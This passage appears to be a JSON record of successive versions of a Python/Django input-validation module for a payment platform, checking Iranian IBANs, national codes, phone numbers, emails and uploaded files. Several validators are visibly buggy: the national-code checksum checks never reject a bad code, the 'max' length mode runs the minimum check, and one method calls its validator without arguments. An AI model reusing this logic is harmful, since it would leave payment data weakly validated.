data):\n file = data['value']\n field = data['field']\n if file is None:\n self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)\n return\n elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:\n self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)\n types = data['options'].get('types', None)\n valid = False\n if types is not None:\n for type in types:\n valid = valid or type in file.content_type\n if valid is False:\n self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)\n\n def _check_with_IBANValidator(self, data):\n iban = data['value']\n if len(iban) != 26 or not iban.startswith('IR'):\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n return\n code = iban[4:] + iban[:4]\n code = code.replace('I', '18').replace('R', '27')\n if int(code) % 97 != 1:\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n\n def _check_with_subMerchantBankAccountValidator(self, data):\n if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID\n =data['value']['subId'], status=1).exists():\n self.setError(data['field'], enum.Error.\n IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)\n\n def _check_with_minDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) < data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_maxDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) > data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_equalDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) != data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_inputValidator(self, data):\n if data['value'] is None or len(data['value']) < 1:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_IbanTransferable(self, data):\n if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':\n self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value\n )\n\n def _check_with_username(self, data):\n username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])\n if username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def checkType(self, field, type, value='unAssigned'):\n self.addValidation({'field': field, 'type': type, 'value': value},\n self._check_with_typeValidator)\n return self\n\n def checkNationalLegalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalLegalCodeValidator)\n return self\n\n def checkOfficer1NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer1NationalCodeValidator)\n return self\n\n def checkOfficer2NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer2NationalCodeValidator)\n return self\n\n def checkNationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalCodeValidator)\n return self\n\n def checkFeatures(self, field, features='unAssigned'):\n self.addValidation({'field': field, 'value': features}, self.\n _check_with_featuresValidator)\n return self\n\n def checkUserName(self, field, username='unAssigned'):\n self.addValidation({'field': field, 'value': username}, self.\n _check_with_userNameValidator)\n return self\n\n def checkPhone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_phoneNumberValidator)\n return self\n\n def checkMobile(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_mobileValidator)\n return self\n\n def checkEmail(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_emailValidator)\n return self\n\n def checkNotNone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_noneValidator)\n return self\n\n def checkFile(self, field, data, **options):\n self.addValidation({'field': field, 'value': data, 'options':\n options}, self._check_with_fileValidator)\n return self\n\n def checkIBAN(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IBANValidator)\n return self\n\n def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):\n data = {'userId': userId, 'subId': subId}\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_subMerchantBankAccountValidator)\n return self\n\n def checkDataLength(self, field, length, mode='equal', data='unAssigned'):\n if mode == 'equal':\n validatorFunction = self._check_with_equalDataLengthValidator\n if mode == 'min':\n validatorFunction = self._check_with_minDataLengthValidator\n if mode == 'max':\n validatorFunction = self._check_with_minDataLengthValidator\n self.addValidation({'field': field, 'value': data, 'length': length\n }, validatorFunction)\n return self\n\n def checkInputData(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_inputValidator)\n return self\n\n def checkTelephone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_phoneNumberValidator)\n return self\n\n def checkIsIbanTransferable(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IbanTransferable)\n return self\n\n def checkUsername(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_username())\n\n\nclass DataValidator:\n\n def __init__(self, data={}):\n self.fieldValidator = FieldValidator(data)\n self.objectValidator = ObjectValidator()\n self.errors = {}\n self.statusCode = 200\n\n def getValidatorsErrors(self):\n self.objectValidator.validate()\n self.fieldValidator.validate()\n for key in self.fieldValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.fieldValidator.getErrors()[key]\n self.statusCode = self.fieldValidator.statusCode\n for key in self.objectValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.objectValidator.getErrors()[key]\n self.statusCode = (self.objectValidator.statusCode if self.\n objectValidator.statusCode != 200 else self.statusCode)\n return self.errors\n\n def generateMessage(self):\n messages = []\n errorKeys = self.errors.keys()\n if 'email' in errorKeys:\n messages.append(' آدرس ایمیل نامعتبر است')\n if 'name' in errorKeys:\n messages.append('نام را وارد کنید')\n if 'username' in errorKeys:\n messages.append('نام کاربری را وارد کنید')\n if 'password' in errorKeys:\n messages.append('رمز عبور را وارد کنید')\n if 'mobile' in errorKeys:\n messages.append('تلفن همراه خود را وارد کنید.')\n if 'phone' in errorKeys:\n messages.append(\n 'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')\n if 'iban' in errorKeys or 'IBAN' in errorKeys:\n messages.append(\n 'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'\n )\n if 'user' in errorKeys:\n messages.append('لطفا وارد شوید')\n return messages\n",
"step-3": "<mask token>\n\n\nclass ObjectValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.statusCode = 200\n self.validationPipeline = []\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = ObjectValidator()\n return self\n <mask token>\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.\n INVALID_FIELD_DATA.value)\n\n def addValidation(self, data, validatorFunction):\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_authenticationValidator(self, data):\n if not data['user'].is_authenticated:\n self.setError(data['field'], enum.Error.UNAUTHORIZED.value)\n\n def _check_with_nonDuplicateObjectValidator(self, data):\n model = data['model']\n if model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)\n\n def _check_with_ObjectExistenceValidator(self, data):\n model = data['model']\n if not model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.\n GENERIC_OBJECT_NOT_FOUND.value)\n\n def checkNonDuplicateObject(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter':\n filter}, self._check_with_nonDuplicateObjectValidator)\n return self\n\n def checkObjectExistence(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter':\n filter}, self._check_with_ObjectExistenceValidator)\n return self\n\n def checkUserAuthentication(self, field, user):\n self.addValidation({'field': field, 'user': user}, self.\n _check_with_authenticationValidator)\n return self\n\n\nclass FieldValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.validationPipeline = []\n self.statusCode = 200\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = FieldValidator()\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.\n INVALID_FIELD_DATA.value)\n return self\n\n def addValidation(self, data, validatorFunction):\n if data['value'] == 'unAssigned' and data['field'] in self.data.keys():\n data['value'] = self.data[data['field']]\n elif data['value'] == 'unAssigned' and data['field'\n ] not in self.data.keys():\n data['value'] = None\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_typeValidator(self, data):\n if not isinstance(data['value'], data['type']):\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_nationalLegalCodeValidator(self, data):\n nationalLegalCode = data['value']\n result = 0\n validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]\n if len(nationalLegalCode) != 11:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n return\n for i in range(10):\n result += (int(nationalLegalCode[-2]) + 2 + int(\n nationalLegalCode[i])) * validationList[i]\n if result % 11 == 10:\n reminder = 0\n else:\n reminder = result % 11\n if reminder == int(nationalLegalCode[-1]):\n valid = True\n else:\n valid = False\n if valid is False:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n\n def _check_with_nationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer1NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer2NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_featuresValidator(self, data):\n for i in data['value']:\n if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',\n 'درگاه پرداخت اینترنتی']:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.\n value)\n break\n\n def _check_with_userNameValidator(self, data):\n username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])\n if 'admin' in data['value'] or 'zibal' in data['value'\n ] or username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def _check_with_phoneNumberValidator(self, data):\n if data['value'] is None or len(data) < 1:\n self.setError(data['field'], enum.Error.\n PHONE_INCORRECT_TEMPLATE.value)\n\n def _check_with_mobileValidator(self, data):\n mobileNumber = data['value']\n if mobileNumber is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match('(^09[0-9]{9}$)', mobileNumber)\n if match_object is None or mobileNumber is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_emailValidator(self, data):\n email = data['value']\n if email is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match(\n '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)', email)\n if match_object is None or email is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_noneValidator(self, data):\n if data['value'] is None or data['value'] == '':\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_fileValidator(self, data):\n file = data['value']\n field = data['field']\n if file is None:\n self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)\n return\n elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:\n self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)\n types = data['options'].get('types', None)\n valid = False\n if types is not None:\n for type in types:\n valid = valid or type in file.content_type\n if valid is False:\n self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)\n\n def _check_with_IBANValidator(self, data):\n iban = data['value']\n if len(iban) != 26 or not iban.startswith('IR'):\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n return\n code = iban[4:] + iban[:4]\n code = code.replace('I', '18').replace('R', '27')\n if int(code) % 97 != 1:\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n\n def _check_with_subMerchantBankAccountValidator(self, data):\n if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID\n =data['value']['subId'], status=1).exists():\n self.setError(data['field'], enum.Error.\n IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)\n\n def _check_with_minDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) < data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_maxDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) > data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_equalDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) != data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_inputValidator(self, data):\n if data['value'] is None or len(data['value']) < 1:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_IbanTransferable(self, data):\n if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':\n self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value\n )\n\n def _check_with_username(self, data):\n username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])\n if username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def checkType(self, field, type, value='unAssigned'):\n self.addValidation({'field': field, 'type': type, 'value': value},\n self._check_with_typeValidator)\n return self\n\n def checkNationalLegalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalLegalCodeValidator)\n return self\n\n def checkOfficer1NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer1NationalCodeValidator)\n return self\n\n def checkOfficer2NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer2NationalCodeValidator)\n return self\n\n def checkNationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalCodeValidator)\n return self\n\n def checkFeatures(self, field, features='unAssigned'):\n self.addValidation({'field': field, 'value': features}, self.\n _check_with_featuresValidator)\n return self\n\n def checkUserName(self, field, username='unAssigned'):\n self.addValidation({'field': field, 'value': username}, self.\n _check_with_userNameValidator)\n return self\n\n def checkPhone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_phoneNumberValidator)\n return self\n\n def checkMobile(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_mobileValidator)\n return self\n\n def checkEmail(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_emailValidator)\n return self\n\n def checkNotNone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_noneValidator)\n return self\n\n def checkFile(self, field, data, **options):\n self.addValidation({'field': field, 'value': data, 'options':\n options}, self._check_with_fileValidator)\n return self\n\n def checkIBAN(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IBANValidator)\n return self\n\n def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):\n data = {'userId': userId, 'subId': subId}\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_subMerchantBankAccountValidator)\n return self\n\n def checkDataLength(self, field, length, mode='equal', data='unAssigned'):\n if mode == 'equal':\n validatorFunction = self._check_with_equalDataLengthValidator\n if mode == 'min':\n validatorFunction = self._check_with_minDataLengthValidator\n if mode == 'max':\n validatorFunction = self._check_with_minDataLengthValidator\n self.addValidation({'field': field, 'value': data, 'length': length\n }, validatorFunction)\n return self\n\n def checkInputData(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_inputValidator)\n return self\n\n def checkTelephone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_phoneNumberValidator)\n return self\n\n def checkIsIbanTransferable(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IbanTransferable)\n return self\n\n def checkUsername(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_username())\n\n\nclass DataValidator:\n\n def __init__(self, data={}):\n self.fieldValidator = FieldValidator(data)\n self.objectValidator = ObjectValidator()\n self.errors = {}\n self.statusCode = 200\n\n def getValidatorsErrors(self):\n self.objectValidator.validate()\n self.fieldValidator.validate()\n for key in self.fieldValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.fieldValidator.getErrors()[key]\n self.statusCode = self.fieldValidator.statusCode\n for key in self.objectValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.objectValidator.getErrors()[key]\n self.statusCode = (self.objectValidator.statusCode if self.\n objectValidator.statusCode != 200 else self.statusCode)\n return self.errors\n\n def generateMessage(self):\n messages = []\n errorKeys = self.errors.keys()\n if 'email' in errorKeys:\n messages.append(' آدرس ایمیل نامعتبر است')\n if 'name' in errorKeys:\n messages.append('نام را وارد کنید')\n if 'username' in errorKeys:\n messages.append('نام کاربری را وارد کنید')\n if 'password' in errorKeys:\n messages.append('رمز عبور را وارد کنید')\n if 'mobile' in errorKeys:\n messages.append('تلفن همراه خود را وارد کنید.')\n if 'phone' in errorKeys:\n messages.append(\n 'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')\n if 'iban' in errorKeys or 'IBAN' in errorKeys:\n messages.append(\n 'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'\n )\n if 'user' in errorKeys:\n messages.append('لطفا وارد شوید')\n return messages\n",
"step-4": "<mask token>\n\n\nclass ObjectValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.statusCode = 200\n self.validationPipeline = []\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = ObjectValidator()\n return self\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.\n INVALID_FIELD_DATA.value)\n\n def addValidation(self, data, validatorFunction):\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_authenticationValidator(self, data):\n if not data['user'].is_authenticated:\n self.setError(data['field'], enum.Error.UNAUTHORIZED.value)\n\n def _check_with_nonDuplicateObjectValidator(self, data):\n model = data['model']\n if model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)\n\n def _check_with_ObjectExistenceValidator(self, data):\n model = data['model']\n if not model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.\n GENERIC_OBJECT_NOT_FOUND.value)\n\n def checkNonDuplicateObject(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter':\n filter}, self._check_with_nonDuplicateObjectValidator)\n return self\n\n def checkObjectExistence(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter':\n filter}, self._check_with_ObjectExistenceValidator)\n return self\n\n def checkUserAuthentication(self, field, user):\n self.addValidation({'field': field, 'user': user}, self.\n _check_with_authenticationValidator)\n return self\n\n\nclass FieldValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.validationPipeline = []\n self.statusCode = 200\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = FieldValidator()\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.\n INVALID_FIELD_DATA.value)\n return self\n\n def addValidation(self, data, validatorFunction):\n if data['value'] == 'unAssigned' and data['field'] in self.data.keys():\n data['value'] = self.data[data['field']]\n elif data['value'] == 'unAssigned' and data['field'\n ] not in self.data.keys():\n data['value'] = None\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_typeValidator(self, data):\n if not isinstance(data['value'], data['type']):\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_nationalLegalCodeValidator(self, data):\n nationalLegalCode = data['value']\n result = 0\n validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]\n if len(nationalLegalCode) != 11:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n return\n for i in range(10):\n result += (int(nationalLegalCode[-2]) + 2 + int(\n nationalLegalCode[i])) * validationList[i]\n if result % 11 == 10:\n reminder = 0\n else:\n reminder = result % 11\n if reminder == int(nationalLegalCode[-1]):\n valid = True\n else:\n valid = False\n if valid is False:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n\n def _check_with_nationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer1NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer2NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_featuresValidator(self, data):\n for i in data['value']:\n if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',\n 'درگاه پرداخت اینترنتی']:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.\n value)\n break\n\n def _check_with_userNameValidator(self, data):\n username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])\n if 'admin' in data['value'] or 'zibal' in data['value'\n ] or username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def _check_with_phoneNumberValidator(self, data):\n if data['value'] is None or len(data) < 1:\n self.setError(data['field'], enum.Error.\n PHONE_INCORRECT_TEMPLATE.value)\n\n def _check_with_mobileValidator(self, data):\n mobileNumber = data['value']\n if mobileNumber is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match('(^09[0-9]{9}$)', mobileNumber)\n if match_object is None or mobileNumber is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_emailValidator(self, data):\n email = data['value']\n if email is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match(\n '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)', email)\n if match_object is None or email is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_noneValidator(self, data):\n if data['value'] is None or data['value'] == '':\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_fileValidator(self, data):\n file = data['value']\n field = data['field']\n if file is None:\n self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)\n return\n elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:\n self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)\n types = data['options'].get('types', None)\n valid = False\n if types is not None:\n for type in types:\n valid = valid or type in file.content_type\n if valid is False:\n self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)\n\n def _check_with_IBANValidator(self, data):\n iban = data['value']\n if len(iban) != 26 or not iban.startswith('IR'):\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n return\n code = iban[4:] + iban[:4]\n code = code.replace('I', '18').replace('R', '27')\n if int(code) % 97 != 1:\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n\n def _check_with_subMerchantBankAccountValidator(self, data):\n if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID\n =data['value']['subId'], status=1).exists():\n self.setError(data['field'], enum.Error.\n IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)\n\n def _check_with_minDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) < data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_maxDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) > data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_equalDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) != data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_inputValidator(self, data):\n if data['value'] is None or len(data['value']) < 1:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_IbanTransferable(self, data):\n if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':\n self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value\n )\n\n def _check_with_username(self, data):\n username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])\n if username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def checkType(self, field, type, value='unAssigned'):\n self.addValidation({'field': field, 'type': type, 'value': value},\n self._check_with_typeValidator)\n return self\n\n def checkNationalLegalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalLegalCodeValidator)\n return self\n\n def checkOfficer1NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer1NationalCodeValidator)\n return self\n\n def checkOfficer2NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer2NationalCodeValidator)\n return self\n\n def checkNationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalCodeValidator)\n return self\n\n def checkFeatures(self, field, features='unAssigned'):\n self.addValidation({'field': field, 'value': features}, self.\n _check_with_featuresValidator)\n return self\n\n def checkUserName(self, field, username='unAssigned'):\n self.addValidation({'field': field, 'value': username}, self.\n _check_with_userNameValidator)\n return self\n\n def checkPhone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_phoneNumberValidator)\n return self\n\n def checkMobile(self, field, data='unAssigned'):\n 